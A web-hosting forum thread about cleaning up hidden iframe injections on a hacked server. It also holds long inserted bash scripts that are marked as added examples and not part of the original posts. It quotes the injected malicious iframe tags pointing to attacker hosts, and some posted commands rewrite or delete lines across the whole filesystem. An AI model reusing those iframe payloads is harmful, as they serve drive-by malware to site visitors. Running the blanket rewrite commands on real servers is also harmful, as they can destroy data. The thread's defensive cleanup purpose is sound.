  1. #1
    Join Date
    Jun 2004
    Posts
    135

    How to find out hacked files on server?

    My server has been hacked; I can find some HTML and PHP files into which the hacker inserted code similar to the following.

    HTML Code:
    <iframe src="http://a5g.ru:8080/ts/in.cgi?pepsi94" width=125 height=125 style="visibility: hidden"></iframe>
    The inserted iframe src is not the same in every hacked file.

    I am trying to find all the hacked files on the server. Is there any way to do this other than checking the files manually?
    My English is poor. Please tell me when I make a mistake so that I can improve.

  2. #2
    Join Date
    Nov 2001
    Location
    Vancouver
    Posts
    2,416
    Search for iframe within html and php files. They may not all be hacks -- there are legitimate uses for iframe -- but it's a good start.

    However unless you stop the source, you will just end up with more. There have been many threads on this lately here.
    “Even those who arrange and design shrubberies are under
    considerable economic stress at this period in history.”

  3. #3
    Join Date
    Jun 2004
    Posts
    135
    Quote Originally Posted by mwatkins View Post
    Search for iframe within html and php files. They may not all be hacks -- there are legitimate uses for iframe -- but it's a good start.

    However unless you stop the source, you will just end up with more. There have been many threads on this lately here.
    Yes, you are right, but how can I search for the code in all the files on my server? Is there a shell command to do it?

  4. #4
    This seems to be an iframe insertion attack.


    I suggest you restore the files from backup, as searching manually will not be possible.

    And make sure you give 755 permissions to directories and 644 to files to avoid such issues in the future.

  5. #5
    Join Date
    Jun 2004
    Posts
    135
    I was trying to find the infected files with the following command.

    find * | xargs grep 'http://a5g.ru:8080'

    But the results are shown on screen and I am not able to read them all. Can the command be refined?

  6. #6

    Remove infected .php, .html, .htm files

    Try the commands below to locate the infected files.
    ===================================================

    find / -perm 766 -exec ls -ld {} + | grep "Aug 21" > files766.txt
    find / -perm 666 -exec ls -ld {} + | grep "Aug 21" > files666.txt
    find / -perm 777 -exec ls -ld {} + | grep "Aug 21" > files777.txt

    Note : Replace the date "Aug 21" with the date your account was hacked.

    OR

    Try the command mentioned below :
    ============================

    find /home -type f \( -name '*.php' -o -name '*.htm*' \) -print0 | xargs -0 grep -il iframe

    OR

    Try the command mentioned below :
    ============================

    #!/bin/bash
    # "replace" is the MySQL string-replacement utility; it rewrites each file in place.
    TAG='<iframe width="1" height="1" src="http://step57.info/traff/index2.php" style="border: 0;"></iframe>'

    find / -type f -name '*.php' -exec replace "$TAG" '' -- {} \; > /dev/null
    echo "Removed Tag from PHP file"

    find / -type f -name '*.html' -exec replace "$TAG" '' -- {} \; > /dev/null
    echo "Removed Tag from HTML file"

    find / -type f -name '*.htm' -exec replace "$TAG" '' -- {} \; > /dev/null
    echo "Removed Tag from ALL files"

    echo "Server Administrator"
    exit
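    The searches in #2, #5 and #6 key on one literal string, but the original post says the src differs between files. The script below is an added example, not a command from any poster in this thread: it matches the shape of a hidden or 1x1 iframe instead of a fixed URL, collects the distinct src values (the indicators to block and search for), and narrows the search to web files modified after the compromise date. It assumes GNU grep and find (the --include and -newermt options) and that the web content is PHP/HTML under the directory passed as the root; the sample files in the demo are constructed here.

```bash
#!/bin/bash
# Added example for this thread (not a command posted by anyone in it):
# find injected iframes whose src differs from file to file, and list the
# web files changed since the compromise date. Assumes GNU grep/find and
# PHP/HTML content under the directory given as the root.

# Extended regex for an iframe that is hidden with CSS or sized 0/1 pixel.
# Covers the thread's sample (style="visibility: hidden") and the 1x1 variant.
IFRAME_RE="<iframe[^>]*(visibility:[[:space:]]*hidden|display:[[:space:]]*none|(width|height)=['\"]?[01]['\"]?[[:space:]>])"

# scan_iframes ROOT: print file:line:match for every suspicious iframe.
scan_iframes() {
    local root="$1"
    # -r recurse, -I skip binaries, -n line numbers, -i ignore case, -E ERE.
    # grep exits 1 when nothing matches; that is not an error here.
    grep -rInEi --include='*.php' --include='*.html' --include='*.htm' \
        -e "$IFRAME_RE" -- "$root" 2>/dev/null || true
}

# list_iframe_srcs ROOT: reduce the scan to the distinct src values, since
# the thread notes the src is not the same in every infected file.
list_iframe_srcs() {
    scan_iframes "$1" \
        | grep -oEi "src=['\"]?[^'\" >]+" \
        | sed -E "s/^src=['\"]?//" \
        | sort -u
}

# recent_web_files ROOT SINCE: web files modified after SINCE (e.g. 2009-07-09).
# Narrows the search when the injection date is known, as #6 does with ls dates.
recent_web_files() {
    local root="$1" since="$2"
    find "$root" -type f \( -name '*.php' -o -name '*.html' -o -name '*.htm' \) \
        -newermt "$since" -print
}

# Stand-alone demo on constructed sample files (not real data from the thread).
demo() {
    local d
    d=$(mktemp -d)
    mkdir -p "$d/site1" "$d/site2"
    cat > "$d/site1/index.html" <<'EOF'
<html><body><p>Welcome</p>
<iframe src="http://a5g.ru:8080/ts/in.cgi?pepsi94" width=125 height=125 style="visibility: hidden"></iframe>
</body></html>
EOF
    cat > "$d/site2/footer.php" <<'EOF'
<?php echo "footer"; ?><iframe width="1" height="1" src="http://step57.info/traff/index2.php" style="border: 0;"></iframe>
EOF
    # A legitimate, visible embed that must not be flagged.
    cat > "$d/site2/video.html" <<'EOF'
<iframe src="https://www.youtube.com/embed/abc" width="560" height="315"></iframe>
EOF
    echo "== suspicious iframes =="
    scan_iframes "$d"
    echo "== distinct src values =="
    list_iframe_srcs "$d"
    rm -rf "$d"
}

demo
```

    Run scan_iframes against the document root rather than / so the output stays readable, and redirect it to a file; list_iframe_srcs gives the host list to feed into the firewall and into a second, literal grep. A visible iframe with normal dimensions is not reported, so legitimate embeds do not drown the results.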

  7. #7
    Join Date
    Mar 2009
    Location
    Near You..
    Posts
    81
    Quote Originally Posted by KennyP View Post
    My server has been hacked; I can find some HTML and PHP files into which the hacker inserted code similar to the following.

    HTML Code:
    <iframe src="http://a5g.ru:8080/ts/in.cgi?pepsi94" width=125 height=125 style="visibility: hidden"></iframe>
    The inserted iframe src is not the same in every hacked file.

    I am trying to find all the hacked files on the server. Is there any way to do this other than checking the files manually?
    First block the IP address 87.242.98.116 in the firewall to reduce the chances of further infection. Change your FTP password, as well as that of other accounts that may be using the same password.

    Search your web pages using grep for strings like "document.write(unescape(" or other notable strings that you can detect on the affected page.

    Check whether there have been any uploads or changes in the account that you did not make yourself.

    Run clamscan on the account's home dir /home/username.
    Last edited by timelead129; 07-10-2009 at 04:53 AM.

  8. #8
    Join Date
    Jun 2004
    Posts
    135
    Quote Originally Posted by timelead129 View Post
    First block the IP address 87.242.98.116 in the firewall to reduce the chances of further infection. Change your FTP password, as well as that of other accounts that may be using the same password.

    Search your web pages using grep for strings like "document.write(unescape(" or other notable strings that you can detect on the affected page.

    Check whether there have been any uploads or changes in the account that you did not make yourself.

    Run clamscan on the account's home dir /home/username.
    More files are infected now. Can you show me how to block the IP? I have a cPanel server.

  9. #9
    Join Date
    Jun 2004
    Posts
    135
    The hacker is doing more on my server now and I have no idea how to stop him. Can anyone help me?

  10. #10
    Join Date
    Apr 2007
    Location
    US, UK, Europe, ME
    Posts
    258
    Quote Originally Posted by Nelesh O View Post
    Try the commands below to locate the infected files.
    Use the find utility as mentioned above. Also, you should notify your admin to investigate this for you. This is not the proper time to train yourself; it's important to find the source of the attack and lock it down. If you don't have a sysadmin, then this is the time to get an experienced one. Your server may become compromised, if it is not already.

    Regards,

  11. #11
    Join Date
    Jun 2003
    Location
    World Wide Web
    Posts
    581

    How to remove an iframe

    Hi,

    Please use the following script
    ===============
    find /home -type f \( -name "*.php" -o -name "*.html" -o -iname "*.htm" \) -exec grep -l "a5g.ru" {} \; -exec sed -i '/a5g\.ru/d' {} \;
    ===============

    The above command removes every line that contains the string "a5g.ru". The command searches all the files under /home.

    We are advising you to take necessary backups before running the above script.


    The basic steps to prevent this type of attack in the future are

    1) Scan your server periodically and check for rootkits and vulnerabilities.

    2) Update all third-party software to the latest version

    3) Make sure your FTP passwords are updated

    4) Ensure that appropriate file permissions are used for every file and directory on the web server
    Last edited by supportexpertz; 07-10-2009 at 07:39 AM.
    SupportExpertz.com - the name says it all!
    Managed Cloud Servers
    Server Management and Monitoring
    24x7 outsourced customer support

  12. #12
    Join Date
    Apr 2004
    Location
    Germany
    Posts
    37
    How to find out hacked files on server?
    This is, of course, a question that matters now. However, you seem to be doing the second step before the first.

    Your server is compromised. At this time it is unclear whether the compromise is limited to an unprivileged account or not (i.e. whether the root account is compromised, too).

    You state that the attacker (which is most likely not a real person but some script which is executed on many compromised servers such as yours at the same time) is still making modifications to your web pages. As such, the attacker still has control over parts or all of your server.

    The first thing you need to do now is to prevent this from continuing.

    I recommend that you take notes of all actions you take, including time and date. This way you will be able to roll back any revertible changes you make now.

    If you have remote access through a serial console to your server, then disable the network interface now and examine the situation through the serial console.

    Alternatively, if you have KVM access, do the same.

    If you have neither remote serial console nor KVM access then use either iptables firewalling or hosts.allow/hosts.deny to limit access to your server to incoming connections from another server you manage. Disabling the web and FTP servers is another option but may well be insufficient to lock the attacker out (they may have a backdoor installed which comes with its own server process and will still function after you have taken down the web and FTP servers).

    If this seems too complicated, contact your ISP/hosting provider; they will be able and willing to help you out (it is in their interest, too).

    Now notify your clients that an unplanned outage has occurred and give an ETA based on how long you think it will take you to follow the steps outlined below.

    Once this is done, you should investigate how and when the attacker was able to intrude into the system. And once that is clear, you should revert to the most recent backup which was made before the attacker gained access to your system.

    If this is not an option, you can also try to find out which alterations the attacker has made and try to revert them. This is, however, unsafe, since you cannot be sure that there have not been additional alterations made which you are not aware of.

    Only after you are completely convinced that you have removed both the vulnerability the attacker used to compromise your system and the alterations they made, re-enable network access to your system and inform your clients/users what has happened and how you reacted to it.
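    The iptables lockdown described above (and the IP block asked for in #7 and #8), as an added example that is not from any poster in this thread. It generates an iptables-restore ruleset that drops everything except loopback, established connections and one management host, and drops the address named in #7, so the rules can be read before they are loaded. Assumptions not in the thread: iptables with the conntrack match is available, and 203.0.113.10 is a placeholder for the management host, not an address from the thread.

```bash
#!/bin/bash
# Added example for this thread (not from any poster): the iptables lockdown
# described in #12, limiting inbound access to one management host and
# blocking the address named in #7. The ruleset is printed in
# iptables-restore format for review; apply_lockdown loads it only as root.
# Assumes iptables with the conntrack match. 203.0.113.10 is a placeholder.

# valid_ipv4 ADDR: 0 for a dotted quad with every octet in 0..255, else 1.
valid_ipv4() {
    local ip="$1" o old_ifs
    case "$ip" in *[!0-9.]*|.*|*.|*..*) return 1 ;; esac
    old_ifs=$IFS; IFS=.; set -- $ip; IFS=$old_ifs
    [ $# -eq 4 ] || return 1
    for o in "$@"; do
        [ "$o" -le 255 ] || return 1
    done
    return 0
}

# lockdown_rules ADMIN_IP [BLOCK_IP ...]: print the ruleset to stdout.
lockdown_rules() {
    local admin="$1" b
    shift
    valid_ipv4 "$admin" || { echo "bad admin IP: $admin" >&2; return 1; }
    echo '*filter'
    echo ':INPUT DROP [0:0]'        # default deny: web, FTP and mail go dark
    echo ':FORWARD DROP [0:0]'
    echo ':OUTPUT ACCEPT [0:0]'
    echo '-A INPUT -i lo -j ACCEPT'
    # Keep the current SSH session and replies to outbound traffic alive,
    # so applying the rules does not cut off the person applying them.
    echo '-A INPUT -m conntrack --ctstate ESTABLISHED,RELATED -j ACCEPT'
    # Explicit drops go before the admin accept so an attacker address can
    # never be the admin address by mistake.
    for b in "$@"; do
        valid_ipv4 "$b" || { echo "bad block IP: $b" >&2; return 1; }
        echo "-A INPUT -s $b -j DROP"
    done
    echo "-A INPUT -s $admin -j ACCEPT"
    echo 'COMMIT'
}

# apply_lockdown ADMIN_IP [BLOCK_IP ...]: load the ruleset. Refuses to run
# unless root, and only after the ruleset was generated without error.
apply_lockdown() {
    local rules
    rules=$(lockdown_rules "$@") || return 1
    [ "$(id -u)" -eq 0 ] || { echo "run as root to apply" >&2; return 1; }
    printf '%s\n' "$rules" | iptables-restore
}

# Review first: placeholder management host plus the address from #7.
lockdown_rules 203.0.113.10 87.242.98.116
```

    Save the running rules with iptables-save before applying, and run apply_lockdown from a session that originates at the management host; the ESTABLISHED,RELATED rule keeps that session open. This only closes remote access; the point made above that a backdoor process may still be running on the box stands, which is why the investigation follows rather than replaces the lockdown.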

  13. #13
    Join Date
    Jun 2004
    Posts
    135
    By using the provided scripts, I think I have temporarily removed the infected files on the server.

    I have to investigate the source and take the necessary precautions now. The advice from mnaumann is great, but I am not able to take down the server, as downtime means a big loss to me.

    I think I should hire a system admin to solve the problem; as mentioned by Sys Admin, this is not a time for training myself.

    How can I find a reliable system admin on the Internet? Is there any place to find an expert?

  14. #14
    Join Date
    Apr 2004
    Location
    Germany
    Posts
    37
    Sure, just post a request in the Systems Management Requests forum.
    Last edited by mnaumann; 07-12-2009 at 06:29 AM. Reason: added URL

  15. #15
    Join Date
    May 2009
    Posts
    31
    You can use the following script to search for and remove the iframe

    find /home -type f \( -name "*.php" -o -name "*.html" -o -iname "*.htm" \) -exec grep -l "a5g.ru" {} \; -exec sed -i '/a5g\.ru/d' {} \;

    You can install mod_security and add the sec2 rules from the gotroot rules to avoid further injection and malware attacks.
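    The sed command posted in #11 and #15 deletes every line that contains the host, which also removes any legitimate markup sharing that line (injected tags are commonly appended to an existing line, as in the footer.php style of injection). The script below is an added example, not the posters' command: it removes only the iframe tag that points at the given host, keeps the rest of the line, writes a .bak copy of every file it changes, and verifies afterwards that the host is gone from the live files. Assumptions not in the thread: sed supports -E and -i.bak (GNU or BSD), the injected tag is lowercase <iframe> on a single line as in the thread's samples, and the host argument contains no '#'. The sample file in the demo is constructed here.

```bash
#!/bin/bash
# Added example for this thread, not the command from #11/#15: remove only
# the injected <iframe> tag that points at HOST, keep the rest of the line,
# and keep a .bak copy of every file touched. Assumes sed with -E and
# -i.bak, a lowercase single-line <iframe> tag, and a HOST without '#'.

# regex_escape STRING: escape ERE metacharacters so "a5g.ru" matches literally.
regex_escape() {
    printf '%s' "$1" | sed 's/[.[\*^$]/\\&/g'
}

# strip_iframe_host HOST WEBROOT: rewrite matching files, print each one.
strip_iframe_host() {
    local host="$1" root="$2" esc
    esc=$(regex_escape "$host")
    # Only files that really contain the host are rewritten (and backed up).
    find "$root" -type f \( -name '*.php' -o -name '*.html' -o -name '*.htm' \) \
        -exec grep -lF -- "$host" {} + 2>/dev/null |
    while IFS= read -r f; do
        # Delete the tag and an adjacent </iframe>, not the whole line, so
        # legitimate markup on the same line survives. -i.bak keeps evidence.
        sed -E -i.bak "s#<iframe[^>]*${esc}[^>]*>[[:space:]]*(</iframe>)?##g" "$f"
        printf '%s\n' "$f"
    done
}

# verify_gone HOST WEBROOT: 0 when HOST no longer appears in any live file
# (.bak copies are ignored; they are meant to keep the injected content).
verify_gone() {
    ! grep -rqF --exclude='*.bak' -- "$1" "$2"
}

# Demo on a constructed file (not real data from the thread).
demo() {
    local d
    d=$(mktemp -d)
    printf '%s\n' '<html><body><p>Keep me</p><iframe src="http://a5g.ru:8080/ts/in.cgi?pepsi94" width=125 height=125 style="visibility: hidden"></iframe></body></html>' > "$d/index.html"
    echo "modified:"
    strip_iframe_host a5g.ru "$d"
    echo "after:"
    cat "$d/index.html"
    verify_gone a5g.ru "$d" && echo "host gone"
    rm -rf "$d"
}

demo
```

    Run it once per host collected from the scan, then run verify_gone before declaring the content clean. The .bak files hold the injected markup for the later investigation; remove them only once that is done, because they still contain the attacker's URL and will show up in any further literal grep.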

  16. #16
    Join Date
    Mar 2009
    Location
    Chicago, IL
    Posts
    219
    I see it touched on a bit, but no one in this thread really goes into finding the source of the attack so much as trying to recover from the effects of it. Think about it as if you were trying to remove a branch from a thorn tree and you kept getting stabbed by the thorns. Would you keep putting band-aids on your hands to stop the bleeding and try again? No, you'd fix the problem at its root and get a pair of gloves.

    First and foremost, chances are you have 1. Insecure scripts that are being exploited. 2. Insecure FTP passwords that are being exploited.

    Now if these iframe insertions are happening through different user accounts, we can probably rule out upload/modification via FTP (possibly). Chances are you've got an old insecure PHP script somewhere that's being exploited.

    If this is a cPanel machine, the first thing I'd do is run '/scripts/phpopenbasedirctl on'. More than likely this is a PHP script that's being exploited, and this will force the attacker/script owner to stay within the confines of the home directory that's being exploited. So you'll effectively limit this to one site.

    Next up, if you're not running suPHP, you should be. You can fix this via Easyapache (once again, assuming cPanel here). This will further help mitigate the damage a single hacked site can do. It'll also leave a trail as any files this user creates, will be owned by the hacked site.

    Now, you can either a: wait for it to happen again and run the permissions trail back down to the offending site and from there go through their access logs and look for very obviously suspect traffic. It should really jump out at you. or b: Apply a *proper* mod_security ruleset as mentioned above, however you should REALLY prune out all the unnecessary signatures as those rulesets are meant to block *everything* and add a ton of overhead to Apache. No point in filtering Windows only exploits when you're running a linux server, etc.

    And as per the usual, if you keep running into this, you should look into hiring an admin to take a look through and sort this out for you. A good admin should be able to find the point of intrusion and kill it in about 30 minutes to an hour at most.

  17. #17
    Join Date
    Apr 2009
    Posts
    839
    Hello,

    you can use something like this to check files:

    grep -Rl 'a5g' .

    this will print you a list of all affected files.

    However it is better to use a find script to replace those lines, and be sure to change all of your FTP passwords. 90% they have been stolen from your Total Commander or FAR Manager etc. on your local computer via some virus. Better change all of your passwords and be sure not to check the 'Save/Remember password' option in any program.


    Injection is also possible in old versions of CMSes like Joomla and WordPress.

    Hope this helps.
